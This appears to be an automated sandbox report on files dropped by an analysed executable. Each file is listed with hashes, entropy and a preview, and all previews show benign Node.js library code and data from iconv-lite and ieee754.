              SHA-256:FB511C4C70A6CB0E2A06D03E67CA88DCA9F4DA6266B909C7338E453D2ECC9FDB
              SHA-512:8285675ABD62F7174D2D94C15047B3032E616E73E885F8075B7CA073A59322C391EBD68CA3144BBEB8B06E7026600EF9C3BDE43733F25EB7D6890167D0F907A5
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// Single-byte codec. Needs a 'chars' string parameter that contains 256 or 128 chars that.// correspond to encoded bytes (if 128 - then lower half is ASCII). ..exports._sbcs = SBCSCodec;.function SBCSCodec(codecOptions, iconv) {. if (!codecOptions). throw new Error("SBCS codec is called without the data."). . // Prepare char buffer for decoding.. if (!codecOptions.chars || (codecOptions.chars.length !== 128 && codecOptions.chars.length !== 256)). throw new Error("Encoding '"+codecOptions.type+"' has incorrect 'chars' (must be of len 128 or 256)");. . if (codecOptions.chars.length === 128) {. var asciiString = "";. for (var i = 0; i < 128; i++). asciiString += String.fromCharCode(i);. codecOptions.chars = asciiString + codecOptions.chars;. }.. this.decodeBuf = Buffer.from(codecOptions.chars, 'ucs2');. . // Encoding buffer.. var encodeBuf = Buffer.al
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:data
              Category:dropped
              Size (bytes):32034
              Entropy (8bit):6.328773645887887
              Encrypted:false
              SSDEEP:
              MD5:78C27D9268D36644AC77B82B956F5B1F
              SHA1:8CEB7540842B7FB237391EC3C324035A3FEB7336
              SHA-256:2CF44B3F70C61C9CDD59FDA7EC085BC3180809638F208C7239688CCB90A48866
              SHA-512:AB9154847D29136D4A5E7C7B06105704E6CF42966F26066D87F8E54EB5CE49849757400A9E84E09D8F0C22FFA45F4EDF47339525F8E5DC06FD427DC85A5A3416
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..// Generated data for sbcs codec. Don't edit manually. Regenerate using generation/gen-sbcs.js script..module.exports = {. "437": "cp437",. "737": "cp737",. "775": "cp775",. "850": "cp850",. "852": "cp852",. "855": "cp855",. "856": "cp856",. "857": "cp857",. "858": "cp858",. "860": "cp860",. "861": "cp861",. "862": "cp862",. "863": "cp863",. "864": "cp864",. "865": "cp865",. "866": "cp866",. "869": "cp869",. "874": "windows874",. "922": "cp922",. "1046": "cp1046",. "1124": "cp1124",. "1125": "cp1125",. "1129": "cp1129",. "1133": "cp1133",. "1161": "cp1161",. "1162": "cp1162",. "1163": "cp1163",. "1250": "windows1250",. "1251": "windows1251",. "1252": "windows1252",. "1253": "windows1253",. "1254": "windows1254",. "1255": "windows1255",. "1256": "windows1256",. "1257": "windows1257",. "1258": "windows1258",. "28591": "iso88591",. "28592": "iso88592",. "28593": "iso88593",. "28594": "iso88594",. "28595": "iso88595",. "28596": "iso8
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):5116
              Entropy (8bit):5.4242106252067765
              Encrypted:false
              SSDEEP:
              MD5:813AB0357C738EF0F84B345676F85608
              SHA1:3FFF3786F5B669A24A56FFBE66593829DB7679B4
              SHA-256:ECD0497DB604060A3BF432EA4E2BDE76A427DCB6AFCEDC05C24567773EB0D25C
              SHA-512:6CAF317BCF8586E012058F997B17D7C53309C8F520EDC08A01510BE27F959792E3B0C811D938EDAABDC483887518EF97F3F8B268509B550D15CA42E8F4CA3641
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..// Manually added data to be used by sbcs codec in addition to generated one...module.exports = {. // Not supported by iconv, not sure why.. "10029": "maccenteuro",. "maccenteuro": {. "type": "_sbcs",. "chars": "................................................................................................................................". },.. "808": "cp808",. "ibm808": "cp808",. "cp808": {. "type": "_sbcs",. "chars": "................................................................................................................................". },.. "mik": {. "type": "_sbcs",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):17717
              Entropy (8bit):6.109390635315052
              Encrypted:false
              SSDEEP:
              MD5:F29EDA07F68F9E3F234638D42956F9AB
              SHA1:E61B2D77A36BCE976F563F659300E06A33C9E6E9
              SHA-256:DB94DB5E5D3AB696DDB0025685CFA85DA1864839A4A26AAB2F8F86F6B8382288
              SHA-512:AC83EF6C09AF9258273B586B0B33614B6DA6759930A23BCBF1D0E5428AFC076767916BC49B04A98A1BF952B8E8F9CB0F81283D747A724AF01162DBA184079BE4
              Malicious:false
              Reputation:unknown
              Preview:[.["8740","....................................................."],.["8767","................................"],.["87a1","................................................................................"],.["8840",".",4,"....................................................................."],.["88a1",".............."],.["8940","...."],.["8943","."],.["8946","...."],.["894c","...................................................."],.["89a1","......"],.["89ab","...."],.["89b0","...."],.["89b5","...
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):47320
              Entropy (8bit):5.975707024029791
              Encrypted:false
              SSDEEP:
              MD5:9EAE47ACF0B20461508FDC4506BD905E
              SHA1:22B95CE3E9743DC8DF815B8A6B9C13D1A9F7C229
              SHA-256:8225BB693EFD380279ED7280B8F8419FD069C5F018D20D5946BF187AD92C0CF7
              SHA-512:781667081C82281F69334D917C53ED81A7D283C0B7CCD5C393591790A746C9C0096265403F28555157340C69E37A340BCEE23C3E27AA0BD9A7203D5FC81FDE74
              Malicious:false
              Reputation:unknown
              Preview:[.["0","\u0000",127,"."],.["8140","......................................",5,"..",9,".",6,".."],.["8180",".............................................",6,"...",4,"................",4,"...",5,"........................................."],.["8240","....",4,".",8,"...........",4,"....................",11],.["8280","..................",10,"..............",4,"......",7,".",5,".",8,"................",20,".....",4,".",6,"."],.["8340",".",17,".",5,"....",10,".........."
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):38122
              Entropy (8bit):6.187510295563581
              Encrypted:false
              SSDEEP:
              MD5:D99876B274D44FC737C8495BA36B3784
              SHA1:A3A6E6F61A78B50E54947F11CE8DAEBB8756209D
              SHA-256:77A56EA83D0D94D1DC620042AD3C897F0E40814BB05C0085D3AEED0018E8A3E8
              SHA-512:308E4A1051163AA335DE4A255689C579488CB0A01EFFC4CF57392C0F429BBFCAD466F698614EBBFAE38782BD6DED091DEAB012196605CA023E26B6A1C45C900C
              Malicious:false
              Reputation:unknown
              Preview:[.["0","\u0000",127],.["8141",".....",4,".......",6,"...."],.["8161",".........",9,"..",5,"."],.["8181","......",18,"......",4,"..........",6,"..",5,"....",6,".............",7,"..",7,"...........",4,".......",4,"...."],.["8241","...........",7,"...",5],.["8261","......",6,"...",5,"......"],.["8281",".",7,"..",7,"...........",4,"......",10,".",5,".",17,".",7,"......",6,"..",7,".......",18],.["8341",".....",5,"...",5,".",7],.["8361",".",18,"......."],.["8381","...............",4,"............",6,"..",5,".",5,".",46,".....",6,"..",5,"...",8],.["8441","...
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):42356
              Entropy (8bit):5.945150159976492
              Encrypted:false
              SSDEEP:
              MD5:15D09686CE9E9BA80B3014D3161E2E7E
              SHA1:33AD3790A0660CD2B7C0C599A7F5D3C147596BEC
              SHA-256:99E2114DC4B39092617967C763F9EAEB4D8E70551AFC5884BAA3FB92827F3420
              SHA-512:6008770D8E8FCE0F18B1C5F2BC37B51908ECC75FC50D629AA505713FF5E8A934F5F9571703822DF0D22D3B6777B4192B727005E76CCEB578135A41B46C2FDE62
              Malicious:false
              Reputation:unknown
              Preview:[.["0","\u0000",127],.["a140","..............................................................."],.["a1a1","..............................................................",4,"............................"],.["a240","...................................",7,"....................."],.["a2a1","...............",9,".",9,".",8,"....",25,".",21],.["a340",".....",16,".",6,".",16,".",6,".",10],.["a3a1",".",25,"....."],.["a3e1","."],.["a440","..............................
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):41064
              Entropy (8bit):6.013263121353981
              Encrypted:false
              SSDEEP:
              MD5:98D5CF16FC6B791A0B2C829339766D16
              SHA1:9BEB6AFA39229A044FD6935A92CA5E997F6FAC78
              SHA-256:7C4FE279000F7E99FC7CD59AFB1DA21725DCEBDC1BABD9E3B883253A77ABB042
              SHA-512:1A923573B2D41EE7AB42BF6CD21BD17D04B8F0DFE2EBA7419000B2768BB5693C8ED5A32171A9F4E382981368C582C8409CD32A4E1067A4D4D47635C127A042C0
              Malicious:false
              Reputation:unknown
              Preview:[.["0","\u0000",127],.["8ea1",".",62],.["a1a1","..................................................",9,"..................................."],.["a2a1",".............."],.["a2ba","........"],.["a2ca","......."],.["a2dc","..............."],.["a2f2","........"],.["a2fe","."],.["a3b0",".",9],.["a3c1",".",25],.["a3e1",".",25],.["a4a1",".",82],.["a5a1",".",85],.["a6a1",".",16,".",6],.["a6c1",".",16,".",6],.["a7a1",".",5,"..",25],.["a7d1",".",5,"..",25],.["a8a1","................................"],.["ada1",".",19,".",9],.["adc0","......................."],.["addf",".......",4,"..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2216
              Entropy (8bit):3.4322567660280536
              Encrypted:false
              SSDEEP:
              MD5:4FBEC8C88ACBB1EF60A5AEBF9E8E719B
              SHA1:BFCE88FC92E98C19910FBEF1B02B85FB5D2CF2F9
              SHA-256:5A3CC11E38F05A0908442ACBF1C921D0B73F2A304FB6A9E4484E26EB1CA07D76
              SHA-512:B57A454D71E4F01D49ADC606A5C6AB5616869C54F0C3F9C30B80E7EF13A67246E9DFA5AACA06E96B0A76004CCFCA180175825141BB2A7366E65E8F7E443A43DA
              Malicious:false
              Reputation:unknown
              Preview:{"uChars":[128,165,169,178,184,216,226,235,238,244,248,251,253,258,276,284,300,325,329,334,364,463,465,467,469,471,473,475,477,506,594,610,712,716,730,930,938,962,970,1026,1104,1106,8209,8215,8218,8222,8231,8241,8244,8246,8252,8365,8452,8454,8458,8471,8482,8556,8570,8596,8602,8713,8720,8722,8726,8731,8737,8740,8742,8748,8751,8760,8766,8777,8781,8787,8802,8808,8816,8854,8858,8870,8896,8979,9322,9372,9548,9588,9616,9622,9634,9652,9662,9672,9676,9680,9702,9735,9738,9793,9795,11906,11909,11913,11917,11928,11944,11947,11951,11956,11960,11964,11979,12284,12292,12312,12319,12330,12351,12436,12447,12535,12543,12586,12842,12850,12964,13200,13215,13218,13253,13263,13267,13270,13384,13428,13727,13839,13851,14617,14703,14801,14816,14964,15183,15471,15585,16471,16736,17208,17325,17330,17374,17623,17997,18018,18212,18218,18301,18318,18760,18811,18814,18820,18823,18844,18848,18872,19576,19620,19738,19887,40870,59244,59336,59367,59413,59417,59423,59431,59437,59443,59452,59460,59478,59493,63789,63866,6
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1247
              Entropy (8bit):5.05180472379974
              Encrypted:false
              SSDEEP:
              MD5:73B54C6D97C0383EB3251D7764528672
              SHA1:013B886FF382CE21352B60717B7287AEB0CEB532
              SHA-256:10CBB08708F3A431977271887B2663F734390A22CEDF90875FAC9FDBD4BB5317
              SHA-512:F039C139D4D3C7E0DCF04EBA31FDA6725B868D2CD41764BBA00727E458E2BC3B9BFD1C883465EB525DD2942A0C1156B054E0FAB0420614A10D8D8F94B89FC372
              Malicious:false
              Reputation:unknown
              Preview:[.["a140",".",62],.["a180",".",32],.["a240",".",62],.["a280",".",32],.["a2ab",".",5],.["a2e3",".."],.["a2ef",".."],.["a2fd",".."],.["a340",".",62],.["a380",".",31,"."],.["a440",".",62],.["a480",".",32],.["a4f4",".",10],.["a540",".",62],.["a580",".",32],.["a5f7",".",7],.["a640",".",62],.["a680",".",32],.["a6b9",".",7],.["a6d9",".",6],.["a6ec",".."],.["a6f3","."],.["a6f6",".",8],.["a740",".",62],.["a780",".",32],.["a7c2",".",14],.["a7f2",".",12],.["a896",".",10],.["a8bc","."],.["a8bf","."],.["a8c1","...."],.["a8ea",".",20],.["a958","."],.["a95b","."],.["a95d","..."],.["a989","..",11],.["a997",".",12],.["a9f0",".",14],.["aaa1",".",93],.["aba1",".",93],.["aca1",".",93],.["ada1",".",93],.["aea1",".",93],.["afa1",".",93],.["d7fa",".",4],.["f8a1",".",93],.["f9a1",".",93],.["faa1",".",93],.["fba1",".",93],.["fca1",".",93],.["fda1",".",93],.["fe50","........
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):23782
              Entropy (8bit):6.017531553224289
              Encrypted:false
              SSDEEP:
              MD5:6D542FFDF3409FD2E8BD01247777B6F7
              SHA1:E02D26E47A7B295222C3CA70015024CA163E7381
              SHA-256:02B0B120F697C48133E8B547E8DC594BC5B9F1C1799B50C2C5FF917298548558
              SHA-512:E02449D3561A4D3856C981FCC350D0836BA3E55C82DD96585E055F6E16DCFD2C1D3ECE44CF473F55924301A1143F66DD372793EDD13BA30254B2944657A3841C
              Malicious:false
              Reputation:unknown
              Preview:[.["0","\u0000",128],.["a1",".",62],.["8140","..................................................",9,"...."],.["8180","............................................."],.["81b8","........"],.["81c8","......."],.["81da","..............."],.["81f0","........"],.["81fc","."],.["824f",".",9],.["8260",".",25],.["8281",".",25],.["829f",".",82],.["8340",".",62],.["8380",".",22],.["839f",".",16,".",6],.["83bf",".",16,".",6],.["8440",".",5,"..",25],.["8470",".",5,"..",7],.["8480",".",17],.["849f","................................"],.["8740",".",19,".",9],.["875f","......................."],.["877e"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5502
              Entropy (8bit):4.828208670463655
              Encrypted:false
              SSDEEP:
              MD5:CFBD24DE620BD461D2D1DD9B9553E69C
              SHA1:4D16C1C169AE5902B17009D5F54216EF2A503713
              SHA-256:506EABEE3546C0551F78E6ADB3102F4E73E7312B4C709117D0DA016B0F5B3D80
              SHA-512:35497628821452BE9729955BD4870C6626799C94EDCAD60D6F638141E253E0947319DC044E34F84059AECF7231C9DA65562B9AD84BCE6FE68D8504279025BDA2
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// Note: UTF16-LE (or UCS2) codec is Node.js native. See encodings/internal.js..// == UTF16-BE codec. ==========================================================..exports.utf16be = Utf16BECodec;.function Utf16BECodec() {.}..Utf16BECodec.prototype.encoder = Utf16BEEncoder;.Utf16BECodec.prototype.decoder = Utf16BEDecoder;.Utf16BECodec.prototype.bomAware = true;...// -- Encoding..function Utf16BEEncoder() {.}..Utf16BEEncoder.prototype.write = function(str) {. var buf = Buffer.from(str, 'ucs2');. for (var i = 0; i < buf.length; i += 2) {. var tmp = buf[i]; buf[i] = buf[i+1]; buf[i+1] = tmp;. }. return buf;.}..Utf16BEEncoder.prototype.end = function() {.}...// -- Decoding..function Utf16BEDecoder() {. this.overflowByte = -1;.}..Utf16BEDecoder.prototype.write = function(buf) {. if (buf.length == 0). return '';.. var buf2 = Buffer.alloc(buf.length + 1),. i = 0, j = 0;.. if (this.overflowByt
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):9982
              Entropy (8bit):4.733283798893383
              Encrypted:false
              SSDEEP:
              MD5:58140AA0971B80549F981B175E0F0625
              SHA1:FE68FF5F07B7AD791DD041F9183F68690BB05F0F
              SHA-256:3A762514744C1EDCAF5262F77DF105F89581C1292B8321B6F96AD49E9244D95A
              SHA-512:DD2DA193982EF298856E62B8F6098F8AFCA1D33D83A46F487F654BC67B0795F75941DFF8A50502E534244CC70B1F4539CA1D4F9F60DE132A03C5C7B20A40FC45
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var Buffer = require('safer-buffer').Buffer;..// == UTF32-LE/BE codec. ==========================================================..exports._utf32 = Utf32Codec;..function Utf32Codec(codecOptions, iconv) {. this.iconv = iconv;. this.bomAware = true;. this.isLE = codecOptions.isLE;.}..exports.utf32le = { type: '_utf32', isLE: true };.exports.utf32be = { type: '_utf32', isLE: false };..// Aliases.exports.ucs4le = 'utf32le';.exports.ucs4be = 'utf32be';..Utf32Codec.prototype.encoder = Utf32Encoder;.Utf32Codec.prototype.decoder = Utf32Decoder;..// -- Encoding..function Utf32Encoder(options, codec) {. this.isLE = codec.isLE;. this.highSurrogate = 0;.}..Utf32Encoder.prototype.write = function(str) {. var src = Buffer.from(str, 'ucs2');. var dst = Buffer.alloc(src.length * 2);. var write32 = this.isLE ? dst.writeUInt32LE : dst.writeUInt32BE;. var offset = 0;.. for (var i = 0; i < src.length; i += 2) {. var code = src.readUInt16LE(i);. va
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):9283
              Entropy (8bit):4.799985407303719
              Encrypted:false
              SSDEEP:
              MD5:B58375812EB310C311ECE8E9FABC6383
              SHA1:DDE9466EC5423F26F0A70D151FA7A0E2D4555D42
              SHA-256:289DA5C0C44B1EC4A502E2862EE9E46D9B1758420904385FED0ABAE41F138A6C
              SHA-512:AA9F4ABBFC7441D930078C30733EF01A17FCD79CBB0E80C4F0F04FA914E70D813227912EBA21009A3E66FFFFBF6713E066E354ADFC392117A7F4921224C5AAD9
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// UTF-7 codec, according to https://tools.ietf.org/html/rfc2152.// See also below a UTF-7-IMAP codec, according to http://tools.ietf.org/html/rfc3501#section-5.1.3..exports.utf7 = Utf7Codec;.exports.unicode11utf7 = 'utf7'; // Alias UNICODE-1-1-UTF-7.function Utf7Codec(codecOptions, iconv) {. this.iconv = iconv;.};..Utf7Codec.prototype.encoder = Utf7Encoder;.Utf7Codec.prototype.decoder = Utf7Decoder;.Utf7Codec.prototype.bomAware = true;...// -- Encoding..var nonDirectChars = /[^A-Za-z0-9'\(\),-\.\/:\? \n\r\t]+/g;..function Utf7Encoder(options, codec) {. this.iconv = codec.iconv;.}..Utf7Encoder.prototype.write = function(str) {. // Naive implementation.. // Non-direct chars are encoded as "+<base64>-"; single "+" char is encoded as "+-".. return Buffer.from(str.replace(nonDirectChars, function(chunk) {. return "+" + (chunk === '+' ? '' : . this.iconv.encode(chunk, 'utf16-be').toString('base64').
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1109
              Entropy (8bit):4.6422103165542135
              Encrypted:false
              SSDEEP:
              MD5:7B3D4519F05BF0CC8D70A4D950C72C55
              SHA1:5C6518CE3ACC35C3E1DA961BC02C110E08F81DB2
              SHA-256:C230D25D8E7FBB50960C634B636B71327C409E9A77E67FE9446B566BDCEA362D
              SHA-512:BD62DF0406AF2F67D45FC418FAEC70D6D63F58112704CFDF9A28BC633696043554A09048E69ABBB4E3DDE653D85F9D64E9D0D5C0117C7D9D404914DA5323FC07
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..var BOMChar = '\uFEFF';..exports.PrependBOM = PrependBOMWrapper.function PrependBOMWrapper(encoder, options) {. this.encoder = encoder;. this.addBOM = true;.}..PrependBOMWrapper.prototype.write = function(str) {. if (this.addBOM) {. str = BOMChar + str;. this.addBOM = false;. }.. return this.encoder.write(str);.}..PrependBOMWrapper.prototype.end = function() {. return this.encoder.end();.}...//------------------------------------------------------------------------------..exports.StripBOM = StripBOMWrapper;.function StripBOMWrapper(decoder, options) {. this.decoder = decoder;. this.pass = false;. this.options = options || {};.}..StripBOMWrapper.prototype.write = function(buf) {. var res = this.decoder.write(buf);. if (this.pass || !res). return res;.. if (res[0] === BOMChar) {. res = res.slice(1);. if (typeof this.options.stripBOM === 'function'). this.options.stripBOM();. }.. this.pa
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):6321
              Entropy (8bit):4.6950977763502
              Encrypted:false
              SSDEEP:
              MD5:B09DB055087D9A4CCA8FED2D3193413A
              SHA1:0FF1265A3076562AD4830C8C5F247A80BB1832C5
              SHA-256:0CB1506E70126AA00BC5BDF12F2200DB89DB032E8DABF23DCDD6A92B37D0F2AF
              SHA-512:0AFAD6EE7587FEAFBBEBBCD4410F78C1B888C0D22B3068B250761CAD6192E99DDC28E78E328C2B05DA3A23B5AC384DC3A76D75703D63325363757EE7A018208D
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..var Buffer = require("safer-buffer").Buffer;..var bomHandling = require("./bom-handling"),. iconv = module.exports;..// All codecs and aliases are kept here, keyed by encoding name/alias..// They are lazy loaded in `iconv.getCodec` from `encodings/index.js`..iconv.encodings = null;..// Characters emitted in case of error..iconv.defaultCharUnicode = '.';.iconv.defaultCharSingleByte = '?';..// Public API..iconv.encode = function encode(str, encoding, options) {. str = "" + (str || ""); // Ensure string... var encoder = iconv.getEncoder(encoding, options);.. var res = encoder.write(str);. var trail = encoder.end();. . return (trail && trail.length > 0) ? Buffer.concat([res, trail]) : res;.}..iconv.decode = function decode(buf, encoding, options) {. if (typeof buf === 'string') {. if (!iconv.skipDecodeWarning) {. console.error('Iconv-lite warning: decode()-ing strings is deprecated. Refer to https://github.com/ashtuchkin/iconv-lite
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3380
              Entropy (8bit):4.44077698521686
              Encrypted:false
              SSDEEP:
              MD5:8411EA9ECD953ED52D7554EFC623934D
              SHA1:C837BB91B645BA82E9EFFA399DB4B0ACF263C83B
              SHA-256:368596CFA80B9B9C6B93F2FDE73615F10E89D650E6A1C92D3C07D56C34E4E393
              SHA-512:26BE5E7E7D4699084E34E960DAFAC3DBAAD3A71B8D28529CD5907FA82BE058BA085F57136496C1F96AA30EF3DE5AC387981751E806A35446F709396ED769FE35
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..var Buffer = require("safer-buffer").Buffer;..// NOTE: Due to 'stream' module being pretty large (~100Kb, significant in browser environments), .// we opt to dependency-inject it instead of creating a hard dependency..module.exports = function(stream_module) {. var Transform = stream_module.Transform;.. // == Encoder stream =======================================================.. function IconvLiteEncoderStream(conv, options) {. this.conv = conv;. options = options || {};. options.decodeStrings = false; // We accept only strings, so we don't need to decode them.. Transform.call(this, options);. }.. IconvLiteEncoderStream.prototype = Object.create(Transform.prototype, {. constructor: { value: IconvLiteEncoderStream }. });.. IconvLiteEncoderStream.prototype._transform = function(chunk, encoding, done) {. if (typeof chunk != 'string'). return done(new Error("Iconv encoding stream needs strings as its
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1131
              Entropy (8bit):4.466958417468196
              Encrypted:false
              SSDEEP:
              MD5:549E620FD864FFD8ABF14BEA34A2D7CE
              SHA1:A3D90BADF75DB503F5DD3FF3FB76D120D1424978
              SHA-256:3A9582FD121F841C245D1FCF84EF0B9E41C94B785B8D7EB63F9F5AEC9BAD0B98
              SHA-512:A7A19859DFE36928969F6BEF9943CC68AC08334A4A823DE5754ABAAADC6646B1FF722C1FFB6A56E47516FFEB36DCF3030594512E8B90E2A8CA2ED32F8D99F2D9
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "iconv-lite",. "description": "Convert character encodings in pure javascript.",. "version": "0.6.3",. "license": "MIT",. "keywords": [. "iconv",. "convert",. "charset",. "icu". ],. "author": "Alexander Shtuchkin <ashtuchkin@gmail.com>",. "main": "./lib/index.js",. "typings": "./lib/index.d.ts",. "homepage": "https://github.com/ashtuchkin/iconv-lite",. "bugs": "https://github.com/ashtuchkin/iconv-lite/issues",. "repository": {. "type": "git",. "url": "git://github.com/ashtuchkin/iconv-lite.git". },. "engines": {. "node": ">=0.10.0". },. "scripts": {. "coverage": "c8 _mocha --grep .",. "test": "mocha --reporter spec --grep .". },. "browser": {. "stream": false. },. "devDependencies": {. "async": "^3.2.0",. "c8": "^7.2.0",. "errto": "^0.2.1",. "iconv": "^2.3.5",. "mocha": "^3.5.3",. "request": "^2.88.2",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (755)
              Category:dropped
              Size (bytes):1465
              Entropy (8bit):5.095587079116939
              Encrypted:false
              SSDEEP:
              MD5:56C3BE003027D64D24CA6B69A2612F2F
              SHA1:F00E82A911110CD53AAEBDB019A077388FFD252E
              SHA-256:18D45466BA3253DEAE04667E267A91EA8DE8548F18C1125264D1C9DB28194CC1
              SHA-512:A460F89653CECF727B6E0557CCFF188542C64C631F523767C574D127D18AED8A42809C98BE64FCCFD76585ED9647225DF901263BD6155A511F52EDCA5359D0A3
              Malicious:false
              Reputation:unknown
              Preview:Copyright 2008 Fair Oaks Labs, Inc...Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBU
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2154
              Entropy (8bit):4.606344577485021
              Encrypted:false
              SSDEEP:
              MD5:B6E492A06AAB5D4254DF46DA4F5E483C
              SHA1:B247D31878019770FFAB182F3ABAF6E6BF67B3F7
              SHA-256:FE3E2B20C1EBB57C3B390C8F685AD1E04E6F493517FA7E432F4351BB77A1A4D0
              SHA-512:04D4929503327F1348A9DDAD1E48E9423BEB6E6FAD35FED50ADB095D672D1443E90631879EBDF02910D417946EDBE19CA2F90B58ABB0B4B182DE4D67B7B3E5F9
              Malicious:false
              Reputation:unknown
              Preview:/*! ieee754. BSD-3-Clause License. Feross Aboukhadijeh <https://feross.org/opensource> */.exports.read = function (buffer, offset, isLE, mLen, nBytes) {. var e, m. var eLen = (nBytes * 8) - mLen - 1. var eMax = (1 << eLen) - 1. var eBias = eMax >> 1. var nBits = -7. var i = isLE ? (nBytes - 1) : 0. var d = isLE ? -1 : 1. var s = buffer[offset + i].. i += d.. e = s & ((1 << (-nBits)) - 1). s >>= (-nBits). nBits += eLen. for (; nBits > 0; e = (e * 256) + buffer[offset + i], i += d, nBits -= 8) {}.. m = e & ((1 << (-nBits)) - 1). e >>= (-nBits). nBits += mLen. for (; nBits > 0; m = (m * 256) + buffer[offset + i], i += d, nBits -= 8) {}.. if (e === 0) {. e = 1 - eBias. } else if (e === eMax) {. return m ? NaN : ((s ? -1 : 1) * Infinity). } else {. m = m + Math.pow(2, mLen). e = e - eBias. }. return (s ? -1 : 1) * m * Math.pow(2, e - mLen).}..exports.write = function (buffer, value, offset, isLE, mLen, nBytes) {. var e, m, c. var eLen = (nBytes * 8) - mLe
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1194
              Entropy (8bit):4.64005493539081
              Encrypted:false
              SSDEEP:
              MD5:C99BA1A776F9FBC9E23B4F0F7BFB7B0D
              SHA1:19B82F401D4E2EF5DB8528A35B2E12D1A2630D65
              SHA-256:A8004B9C8DFFE2E1B01A058ECF968A5D50BEABCABC43CC98C655184BA6AFC050
              SHA-512:344D7F20A2C81540F2AD77A2511972BE3DEC75DC1FA6157091D9EDE1B1273E17CAFAC3F35485FD22F9C94FEC6F235EDFA731F585A0BC97AB549E9BC484B0A457
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "ieee754",. "description": "Read/write IEEE754 floating point numbers from/to a Buffer or array-like object",. "version": "1.2.1",. "author": {. "name": "Feross Aboukhadijeh",. "email": "feross@feross.org",. "url": "https://feross.org". },. "contributors": [. "Romain Beauxis <toots@rastageeks.org>". ],. "devDependencies": {. "airtap": "^3.0.0",. "standard": "*",. "tape": "^5.0.1". },. "keywords": [. "IEEE 754",. "buffer",. "convert",. "floating point",. "ieee754". ],. "license": "BSD-3-Clause",. "main": "index.js",. "types": "index.d.ts",. "repository": {. "type": "git",. "url": "git://github.com/feross/ieee754.git". },. "scripts": {. "test": "standard && npm run test-node && npm run test-browser",. "test-browser": "airtap -- test/*.js",. "test-browser-local": "airtap --local -- test/*.js",. "test-node": "tape test/*.js". },. "funding": [. {. "type": "github",. "url": "https://github.com/sp
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):8031
              Entropy (8bit):4.480050282319729
              Encrypted:false
              SSDEEP:
              MD5:DF5871A30BEEB7FC9E36827786E99CE5
              SHA1:2A413E6DFEBED5EDCDC6477E80690E3C245694FC
              SHA-256:34EE831C9585CFC2642107348D3D2F91BBE91232D0CD8F2F83E75E04C5DD1B27
              SHA-512:E39B4B2E535E23BFBF9C7472093B24A0BA4A4D25A4C91BB8BCE3BD4B4AE2B0A80E48418C744F02093E38AFB8DAA6C116F63F4BC67D7BD7441DA178BE9950B8F6
              Malicious:false
              Reputation:unknown
